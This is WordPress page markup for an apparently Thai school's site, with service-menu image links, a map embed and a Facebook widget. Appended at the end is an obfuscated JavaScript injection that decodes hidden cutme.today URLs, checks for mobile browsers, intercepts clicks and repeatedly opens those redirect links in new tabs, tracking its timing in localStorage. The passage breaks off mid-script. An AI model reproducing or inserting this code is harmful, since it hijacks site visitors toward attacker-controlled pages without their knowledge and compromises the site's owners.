{\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else 